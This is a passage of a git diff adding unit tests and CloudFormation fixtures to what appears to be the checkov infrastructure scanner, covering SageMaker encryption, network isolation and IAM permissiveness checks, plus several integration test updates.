+from checkov.cloudformation.checks.resource.aws.SagemakerDataQualityJobDefinitionTrafficEncryption import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSagemakerDataQualityJobDefinitionTrafficEncryption(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionTrafficEncryption"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::SageMaker::DataQualityJobDefinition.DataQualityJobDefinitionPass",
+        }
+        failing_resources = {
+            "AWS::SageMaker::DataQualityJobDefinition.DataQualityJobDefinitionFail1",
+            "AWS::SageMaker::DataQualityJobDefinition.DataQualityJobDefinitionFail2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py
new file mode 100644
index 00000000000..1b1218f2ec2
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.SagemakerDataQualityJobDefinitionVolumeEncryption import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSagemakerDataQualityJobDefinitionVolumeEncryption(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionVolumeEncryption"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionPass",
+        }
+        failing_resources = {
+            "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionFail1",
+            "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionFail2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py b/tests/cloudformation/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py
new file mode 100644
index 00000000000..d5775afd38a
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.SagemakerModelWithNetworkIsolation import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSagemakerModelWithNetworkIsolation(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerModelWithNetworkIsolation"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::SageMaker::Model.SageMakerModelPass",
+        }
+        failing_resources = {
+            "AWS::SageMaker::Model.SageMakerModelFail1",
+            "AWS::SageMaker::Model.SageMakerModelFail2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py
new file mode 100644
index 00000000000..1c46768d336
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py
@@ -0,0 +1,41 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.SagemakerNotebookEncryptedWithCMK import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSagemakerNotebookEncryptedWithCMK(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerNotebookEncryptedWithCMK"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::SageMaker::NotebookInstance.BasicNotebookInstancePASS",
+            "AWS::SageMaker::Domain.BasicDomainPASS"
+        }
+        failing_resources = {
+            "AWS::SageMaker::NotebookInstance.BasicNotebookInstanceFAIL",
+            "AWS::SageMaker::Domain.BasicDomainFAIL"
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py
new file mode 100644
index 00000000000..ace3e92f30b
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.SagemakerNotebookInstanceAllowsIMDSv2 import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSagemakerNotebookInstanceAllowsIMDSv2(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerNotebookInstanceAllowsIMDSv2"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::SageMaker::NotebookInstance.BasicNotebookInstancePass",
+        }
+        failing_resources = {
+            "AWS::SageMaker::NotebookInstance.BasicNotebookInstanceFail1",
+            "AWS::SageMaker::NotebookInstance.BasicNotebookInstanceFail2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml
new file mode 100644
index 00000000000..edcaf4cb2bc
--- /dev/null
+++ b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml
@@ -0,0 +1,8 @@
+pass:
+  - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_pass"
+  - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_pass2"
+fail:
+  - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_fail"
+evaluated_keys:
+  - 'AssumeRolePolicyDocument/Statement[?(@/Effect == Allow)]/Action[*]'
+  - 'resource_type'
diff --git a/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml
new file mode 100644
index 00000000000..62879334133
--- /dev/null
+++ b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml
@@ -0,0 +1,64 @@
+Resources:
+  aws_sagemaker_notebook_instance_pass:
+    Type: AWS::SageMaker::NotebookInstance
+    Properties:
+      NotebookInstanceName: my-notebook-instance
+      InstanceType: ""
+      RoleArn: !GetAtt aws_iam_role.Arn
+
+  aws_iam_role:
+    Type: AWS::IAM::Role
+    Properties:
+      AssumeRolePolicyDocument:
+        Version: '2012-10-17'
+        Statement:
+          - Effect: Allow
+            Principal:
+              Service: sagemaker.amazonaws.com
+            Action: sts:AssumeRole
+
+  aws_sagemaker_notebook_instance_pass2:
+    Type: AWS::SageMaker::NotebookInstance
+    Properties:
+      NotebookInstanceName: my-notebook-instance
+      ServiceToken: ""
+      RoleArn: !GetAtt aws_iam_role2.Arn
+
+  aws_iam_role2:
+    Type: AWS::IAM::Role
+    Properties:
+      AssumeRolePolicyDocument:
+        Version: '2012-10-17'
+        Statement:
+          - Effect: Allow
+            Principal:
+              Service: sagemaker.amazonaws.com
+            Action: sts:AssumeRole
+      Policies:
+        - PolicyName: my-policy
+          PolicyDocument:
+            Version: '2012-10-17'
+            Statement:
+              - Effect: Allow
+                Action: sagemaker:*
+                Resource: !Sub 'arn:aws:sagemaker:${AWS::Region}:${AWS::AccountId}:notebook-instance/*'
+                Condition:
+                  IpAddress:
+                    'aws:SourceIp': '192.0.2.0/24'
+
+  aws_sagemaker_notebook_instance_fail:
+    Type: AWS::SageMaker::NotebookInstance
+    Properties:
+      NotebookInstanceName: my-notebook-instance
+      RoleArn: !GetAtt aws_iam_role3.Arn
+
+  aws_iam_role3:
+    Type: AWS::IAM::Role
+    Properties:
+      AssumeRolePolicyDocument:
+        Version: '2012-10-17'
+        Statement:
+          - Effect: Allow
+            Principal:
+              Service: sagemaker.amazonaws.com
+            Action: '*'
diff --git a/tests/cloudformation/graph/checks/test_yaml_policies.py b/tests/cloudformation/graph/checks/test_yaml_policies.py
index bd1559557ae..38ba819fcc7 100644
--- a/tests/cloudformation/graph/checks/test_yaml_policies.py
+++ b/tests/cloudformation/graph/checks/test_yaml_policies.py
@@ -39,6 +39,9 @@ def test_MSKClusterLogging(self):
     def test_LambdaFunction(self):
         self.go("LambdaFunction")
 
+    def test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic(self):
+        self.go("SageMakerIAMPolicyOverlyPermissiveToAllTraffic")
+
     def test_ALBRedirectHTTPtoHTTPS(self):
         self.go("ALBRedirectHTTPtoHTTPS")
 
diff --git a/tests/cloudformation/image_referencer/resources/aws/sagemaker_image_version.yaml b/tests/cloudformation/image_referencer/resources/aws/sagemaker_image_version.yaml
new file mode 100644
index 00000000000..96d34fe4c73
--- /dev/null
+++ b/tests/cloudformation/image_referencer/resources/aws/sagemaker_image_version.yaml
@@ -0,0 +1,23 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+  MySageMakerImageVersion:
+    Type: AWS::SageMaker::ImageVersion
+    Properties:
+      Alias: "latest"
+      Aliases:
+        - "stable"
+        - "recommended"
+      BaseImage: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-base-image:1.0.0"
+      Horovod: false
+      ImageName: "my-sagemaker-image"
+      JobType: "TRAINING"
+      MLFramework: "TensorFlow"
+      Processor: "CPU"
+      ProgrammingLang: "Python"
+      ReleaseNotes: "Initial release of the custom SageMaker image version."
+      VendorGuidance: "NOT_PROVIDED"
+  SageMakerImage:
+    Type: AWS::SageMaker::Image
+    Properties:
+      ImageName: "my-sagemaker-image"
+      RoleArn: "arn:aws:iam::123456789012:role/SageMakerRole"
diff --git a/tests/cloudformation/image_referencer/resources/aws/sagemaker_model.yaml b/tests/cloudformation/image_referencer/resources/aws/sagemaker_model.yaml
new file mode 100644
index 00000000000..f6575c6e4cc
--- /dev/null
+++ b/tests/cloudformation/image_referencer/resources/aws/sagemaker_model.yaml
@@ -0,0 +1,45 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+  MySageMakerModel:
+    Type: AWS::SageMaker::Model
+    Properties:
+      ModelName: "my-single-container-model"
+      ExecutionRoleArn: "arn:aws:iam::123456789012:role/SageMakerRole"
+      PrimaryContainer:
+        Image: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image:latest"
+        ModelDataUrl: "s3://my-bucket/path/to/model.tar.gz"
+        Environment:
+          VAR1: "value1"
+          VAR2: "value2"
+      EnableNetworkIsolation: true
+      VpcConfig:
+        Subnets:
+          - "subnet-0123456789abcdef0"
+          - "subnet-0123456789abcdef1"
+        SecurityGroupIds:
+          - "sg-0123456789abcdef0"
+  MySageMakerModel2:
+    Type: AWS::SageMaker::Model
+    Properties:
+      ModelName: "my-multi-container-model"
+      ExecutionRoleArn: "arn:aws:iam::123456789012:role/SageMakerRole"
+      Containers:
+        - Image: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image-1:latest"
+          ModelDataUrl: "s3://my-bucket/path/to/model-1.tar.gz"
+          Environment:
+            VAR1: "value1"
+            VAR2: "value2"
+        - Image: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image-2:latest"
+          ModelDataUrl: "s3://my-bucket/path/to/model-2.tar.gz"
+          Environment:
+            VAR3: "value3"
+            VAR4: "value4"
+      InferenceExecutionConfig:
+        Mode: "Serial"
+      EnableNetworkIsolation: true
+      VpcConfig:
+        Subnets:
+          - "subnet-0123456789abcdef0"
+          - "subnet-0123456789abcdef1"
+        SecurityGroupIds:
+          - "sg-0123456789abcdef0"
diff --git a/tests/cloudformation/image_referencer/test_runner_aws_resources.py b/tests/cloudformation/image_referencer/test_runner_aws_resources.py
index 6921de5ced6..1bb45bf20f9 100644
--- a/tests/cloudformation/image_referencer/test_runner_aws_resources.py
+++ b/tests/cloudformation/image_referencer/test_runner_aws_resources.py
@@ -257,3 +257,94 @@ def test_lightsail_resources(mocker: MockerFixture, graph_framework):
     assert len(sca_image_report.skipped_checks) == 0
     assert len(sca_image_report.parsing_errors) == 0
 
+
+@pytest.mark.parametrize("graph_framework", GRAPH_FRAMEWORKS)
+def test_sagemaker_image_version_resources(mocker: MockerFixture, graph_framework):
+    # given
+    file_name = "sagemaker_image_version.yaml"
+    image_name = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-base-image:1.0.0"
+    code_lines = "4-19"
+    test_file = RESOURCES_PATH / file_name
+    runner_filter = RunnerFilter(run_image_referencer=True)
+
+    mocker.patch(
+        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
+        side_effect=mock_get_image_cached_result_async,
+    )
+    mocker.patch(
+        "checkov.common.images.image_referencer.get_license_statuses_async",
+        side_effect=mock_get_empty_license_statuses_async,
+    )
+
+    # when
+    with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
+        reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
+
+    # then
+    assert len(reports) == 2
+
+    tf_report = next(report for report in reports if report.check_type == CheckType.CLOUDFORMATION)
+    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
+
+    assert len(tf_report.resources) == 2
+    assert len(tf_report.passed_checks) == 0
+    assert len(tf_report.failed_checks) == 0
+    assert len(tf_report.skipped_checks) == 0
+    assert len(tf_report.parsing_errors) == 0
+
+    assert len(sca_image_report.resources) == 1
+    assert sca_image_report.resources == {f"{file_name} ({image_name} lines:{code_lines} (sha256:2460522297)).go"}
+    assert len(sca_image_report.passed_checks) == 0
+    assert len(sca_image_report.failed_checks) == 3
+    assert len(sca_image_report.skipped_checks) == 0
+    assert len(sca_image_report.parsing_errors) == 0
+
+
+@pytest.mark.parametrize("graph_framework", GRAPH_FRAMEWORKS)
+def test_sagemaker_model_resources(mocker: MockerFixture, graph_framework):
+    # given
+    file_name = "sagemaker_model.yaml"
+    image_name_1 = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image:latest"
+    image_name_2 = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image-1:latest"
+    image_name_3 = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image-2:latest"
+    code_lines_1 = "4-21"
+    code_lines_2 = "22-46"
+    code_lines_3 = "22-46"
+    test_file = RESOURCES_PATH / file_name
+    runner_filter = RunnerFilter(run_image_referencer=True)
+
+    mocker.patch(
+        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
+        side_effect=mock_get_image_cached_result_async,
+    )
+    mocker.patch(
+        "checkov.common.images.image_referencer.get_license_statuses_async",
+        side_effect=mock_get_empty_license_statuses_async,
+    )
+
+    # when
+    with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
+        reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
+
+    # then
+    assert len(reports) == 2
+
+    tf_report = next(report for report in reports if report.check_type == CheckType.CLOUDFORMATION)
+    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
+
+    assert len(tf_report.resources) == 2
+    assert len(tf_report.passed_checks) == 2
+    assert len(tf_report.failed_checks) == 0
+    assert len(tf_report.skipped_checks) == 0
+    assert len(tf_report.parsing_errors) == 0
+
+    assert len(sca_image_report.resources) == 3
+    assert sca_image_report.resources == {
+        f"{file_name} ({image_name_1} lines:{code_lines_1} (sha256:2460522297)).go",
+        f"{file_name} ({image_name_2} lines:{code_lines_2} (sha256:2460522297)).go",
+        f"{file_name} ({image_name_3} lines:{code_lines_3} (sha256:2460522297)).go",
+    }
+    assert len(sca_image_report.passed_checks) == 0
+    assert len(sca_image_report.failed_checks) == 9
+    assert len(sca_image_report.skipped_checks) == 0
+    assert len(sca_image_report.parsing_errors) == 0
diff --git a/tests/cloudformation/runner/resources/double_statement_cloudsplaining.yml b/tests/cloudformation/runner/resources/double_statement_cloudsplaining.yml
new file mode 100644
index 00000000000..96e5c0dd8bb
--- /dev/null
+++ b/tests/cloudformation/runner/resources/double_statement_cloudsplaining.yml
@@ -0,0 +1,22 @@
+AWSTemplateFormatVersion: 2010-09-09
+Description: IAM policy
+Resources:
+  MyResource:
+    Type: 'AWS::IAM::Policy'
+    Properties:
+      PolicyName: root
+      PolicyDocument:
+        Version: 2012-10-17
+        Statement:
+          - Effect: Allow
+            Action:
+            - 's3:GetObject'
+            - 's3:PutObject'
+            Resource: '*'
+          - Effect: Allow
+            Action: 'iam:UpdateAccessKey'
+            Resource: '*'
+      Roles:
+        - example_role
+      Users:
+        - admin
\ No newline at end of file
diff --git a/tests/cloudformation/runner/test_runner.py b/tests/cloudformation/runner/test_runner.py
index ef055e326de..f2aface4866 100644
--- a/tests/cloudformation/runner/test_runner.py
+++ b/tests/cloudformation/runner/test_runner.py
@@ -433,6 +433,17 @@ def test_parsing_error_yaml(self):
                             runner_filter=RunnerFilter(framework='cloudformation'))
         self.assertEqual(report.parsing_errors, [scan_file_path])
 
+    def test_double_statement(self):
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        scan_file_path = os.path.join(current_dir, "resources", "double_statement_cloudsplaining.yml")
+        runner = Runner(db_connector=self.db_connector())
+        report = runner.run(root_folder=None, external_checks_dir=None, files=[scan_file_path],
+                            runner_filter=RunnerFilter(framework=['cloudformation']))
+        self.assertEqual(len(report.failed_checks), 5)
+        id_and_key = [(x.check_id, x.check_result.get('evaluated_keys')) for x in report.failed_checks]
+        self.assertIn(('CKV_AWS_107', ['Properties/PolicyDocument/Statement/[1]/Action']), id_and_key)
+        self.assertIn(('CKV_AWS_111', ['Properties/PolicyDocument/Statement/[0]/Action/[1]/']), id_and_key)
+
     def test_skip_sub_dict_json(self):
         current_dir = os.path.dirname(os.path.realpath(__file__))
         scan_file_path = os.path.join(current_dir, "resources", "skip_sub_dict.json")
diff --git a/tests/cloudformation/test_graph_manager.py b/tests/cloudformation/test_graph_manager.py
index e88defc8407..3a47eff1cf7 100644
--- a/tests/cloudformation/test_graph_manager.py
+++ b/tests/cloudformation/test_graph_manager.py
@@ -14,7 +14,7 @@ def test_build_graph_from_source_directory_no_rendering(self):
         root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, "./runner/resources"))
         graph_manager = CloudformationGraphManager(db_connector=NetworkxConnector())
         local_graph, definitions = graph_manager.build_graph_from_source_directory(root_dir, render_variables=False,
-                                                                                   excluded_paths=["skip.*"])
+                                                                                   excluded_paths=["skip.*", "double_state.*"])
 
         expected_resources_by_file = {
             os.path.join(root_dir, "no_properties.yaml"): [
diff --git a/tests/common/integration_features/test_custom_policies_integration.py b/tests/common/integration_features/test_custom_policies_integration.py
index bb0ad52f72a..b37ebf9ba96 100644
--- a/tests/common/integration_features/test_custom_policies_integration.py
+++ b/tests/common/integration_features/test_custom_policies_integration.py
@@ -22,6 +22,7 @@ def tearDown(self) -> None:
         get_graph_checks_registry("cloudformation").checks = []
         get_graph_checks_registry("terraform").checks = []
         get_graph_checks_registry("kubernetes").checks = []
+        get_graph_checks_registry("bicep").checks = []
 
     def test_integration_valid(self):
         instance = BcPlatformIntegration()
@@ -218,11 +219,14 @@ def test_pre_scan_with_cloned_checks(self):
         cfn_registry = get_graph_checks_registry("cloudformation").checks
         tf_registry = get_graph_checks_registry("terraform").checks
         k8s_registry = get_graph_checks_registry("kubernetes").checks
+        bicep_registry = get_graph_checks_registry("bicep").checks
         self.assertEqual(1, len(custom_policies_integration.bc_cloned_checks))
         self.assertEqual('kpande_AZR_1648821862291', tf_registry[0].id, cfn_registry[0].id)
         self.assertEqual('kpande_AZR_1648821862291', tf_registry[0].bc_id, cfn_registry[0].bc_id)
         self.assertEqual('kpande_kubernetes_1650378013211', k8s_registry[0].id)
         self.assertEqual('kpande_kubernetes_1650378013211', k8s_registry[0].bc_id)
+        self.assertEqual('kpande_bicep_1650378013212', bicep_registry[0].id)
+        self.assertEqual('kpande_bicep_1650378013212', bicep_registry[0].bc_id)
 
     def test_post_runner_with_cloned_checks(self):
         instance = BcPlatformIntegration()
@@ -441,6 +445,23 @@ def test_policy_load_with_resources_types_as_str(self):
                     "Terraform",
                     "CloudFormation"
                 ],
+            },
+            {
+                "id": "policy_id_5",
+                "title": "Custom - ensure SQL pool valid create mode",
+                "severity": "HIGH",
+                "category": "General",
+                "guideline": "Custom - ensure",
+                "code": json.dumps({
+                    "value": "Recovery",
+                    "operator": "equals",
+                    "attribute": "createMode",
+                    "cond_type": "attribute",
+                    "resource_types": [
+                        "Microsoft.Synapse/workspaces/sqlPools"
+                    ]
+                }),
+                "benchmarks": {},
             }
         ]
 
@@ -513,6 +534,23 @@ def mock_custom_policies_response():
                 "frameworks": [
                     "Kubernetes"
                 ]
+            },
+            {
+                "id": "kpande_bicep_1650378013212",
+                "code": "{\"operator\":\"exists\",\"attribute\":\"spec.runAsUser.rule\",\"cond_type\":\"attribute\","
+                        "\"resource_types\":[\"PodSecurityPolicy\"]}",
+                "title": "bicep policy",
+                "guideline": "meaningful guideline for bicep policy",
+                "severity": "HIGH",
+                "pcSeverity": None,
+                "category": "bicep",
+                "pcPolicyId": None,
+                "additionalPcPolicyIds": None,
+                "sourceIncidentId": None,
+                "benchmarks": {},
+                "frameworks": [
+                    "bicep"
+                ]
             }
         ]
     }
diff --git a/tests/common/integration_features/test_licensing_integration.py b/tests/common/integration_features/test_licensing_integration.py
index 62ab6b42d20..f49d595a497 100644
--- a/tests/common/integration_features/test_licensing_integration.py
+++ b/tests/common/integration_features/test_licensing_integration.py
@@ -74,6 +74,8 @@ def test_constants(self):
             'sast_python',
             'sast_java',
             'sast_javascript',
+            'sast_typescript',
+            'sast_golang',
             '3d_policy'
         })
 
diff --git a/tests/common/integration_features/test_policy_metadata_integration.py b/tests/common/integration_features/test_policy_metadata_integration.py
index 9091340eaf0..d584a941303 100644
--- a/tests/common/integration_features/test_policy_metadata_integration.py
+++ b/tests/common/integration_features/test_policy_metadata_integration.py
@@ -13,12 +13,15 @@ def test_filtered_policy_ids(self):
         instance.bc_api_key = '00000000-0000-0000-0000-000000000000::1234=='
         instance.customer_run_config_response = mock_customer_run_config()
         instance.prisma_policies_response = mock_prisma_policies_response()
+        instance.prisma_policies_exception_response = [mock_prisma_policies_response()[0]]
         metadata_integration = PolicyMetadataIntegration(instance)
         metadata_integration.bc_integration = instance
         metadata_integration.pre_scan()
         metadata_integration.pc_to_ckv_id_mapping
-        self.assertDictEqual(metadata_integration.pc_to_ckv_id_mapping, {'6960be11-e3a6-46cc-bf66-933c57c2af5d': 'CKV_AWS_212', '3dc2478c-bf25-4383-aaa1-30feb5cda586': '806079891421835264_AZR_1685557908904', 'c11ce08c-b93e-4e11-8d1c-e5a1339139d1': 'CKV_AWS_40', '0e4c576e-c934-4af3-8592-a53920e71ffb': 'CKV_AWS_53'})
+        self.assertDictEqual(metadata_integration.pc_to_ckv_id_mapping, {'6960be11-e3a6-46cc-bf66-933c57c2af5d': 'CKV_AWS_212', '3dc2478c-bf25-4383-aaa1-30feb5cda586': '806079891421835264_AZR_1685557908904', 'c11ce08c-b93e-4e11-8d1c-e5a1339139d1': 'CKV_AWS_40', '0e4c576e-c934-4af3-8592-a53920e71ffb': 'CKV_AWS_53', '1234': 'CKV3_SAST_123'})
         self.assertListEqual(metadata_integration.filtered_policy_ids, ['CKV_AWS_212', '806079891421835264_AZR_1685557908904', 'CKV_AWS_40', 'CKV_AWS_53', 'CKV_AZURE_122'])
+        self.assertListEqual(metadata_integration.filtered_exception_policy_ids, ['CKV_AWS_212'])
+        self.assertSetEqual(set(metadata_integration.sast_check_metadata.keys()), {'CKV3_SAST_123'})
 
 
 def mock_customer_run_config():
@@ -87,6 +90,22 @@ def mock_customer_run_config():
                     "3dc2478c-bf25-4383-aaa1-30feb5cda586"
                 ],
                 "benchmarks": {}
+            },
+            "CKV3_SAST_123": {
+                "id": "BC_SAST_123",
+                "title": "sast",
+                "guideline": "https://docs.bridgecrew.io/docs/abc",
+                "severity": "LOW",
+                "pcSeverity": "LOW",
+                "category": "Networking",
+                "checkovId": "CKV3_SAST_123",
+                "constructiveTitle": "sast",
+                "descriptiveTitle": "sast",
+                "pcPolicyId": "1234",
+                "additionalPcPolicyIds": [
+                    "1234"
+                ],
+                "benchmarks": {}
             }
         },
         "customPolicies": [
diff --git a/tests/common/integration_features/test_repo_config_integration.py b/tests/common/integration_features/test_repo_config_integration.py
index a847c461be9..3634ffa4cc0 100644
--- a/tests/common/integration_features/test_repo_config_integration.py
+++ b/tests/common/integration_features/test_repo_config_integration.py
@@ -792,6 +792,27 @@ def test_skip_paths_non_matching(self):
         repo_config_integration._set_exclusion_paths(vcs_config)
         self.assertEqual(repo_config_integration.skip_paths, set())
 
+    def test_skip_paths_no_repos(self):
+        vcs_config = {
+            "scannedFiles": {
+                "sections": [
+                    {
+                        "repos": [],
+                        "rule": {
+                            "excludePaths": []
+                        },
+                        "isDefault": True
+                    }
+                ]
+            }
+        }
+
+        instance = BcPlatformIntegration()
+        instance.repo_id = 'org/repo'
+        repo_config_integration = RepoConfigIntegration(instance)
+        repo_config_integration._set_exclusion_paths(vcs_config)
+        self.assertEqual(repo_config_integration.skip_paths, set())
+
     def test_skip_paths_multiple_one_match(self):
         vcs_config = {
             "scannedFiles": {
diff --git a/tests/common/integration_features/test_suppressions_integration.py b/tests/common/integration_features/test_suppressions_integration.py
index c5c00cb994d..056480dbfd3 100644
--- a/tests/common/integration_features/test_suppressions_integration.py
+++ b/tests/common/integration_features/test_suppressions_integration.py
@@ -226,6 +226,37 @@ def test_policy_suppression(self):
         self.assertTrue(suppressions_integration._check_suppression(record1, suppression))
         self.assertFalse(suppressions_integration._check_suppression(record2, suppression))
 
+    def test_policy_v2_suppression(self):
+        instance = BcPlatformIntegration()
+
+        suppressions_integration = SuppressionsIntegration(instance)
+        suppressions_integration._init_repo_regex()
+
+        suppression = {
+            "ruleType": "policy",
+            "checkovPolicyIds": ["CKV_AWS_79", "CKV_AWS_80"],
+        }
+
+        record1 = Record(check_id='CKV_AWS_79', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record2 = Record(check_id='CKV_AWS_80', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
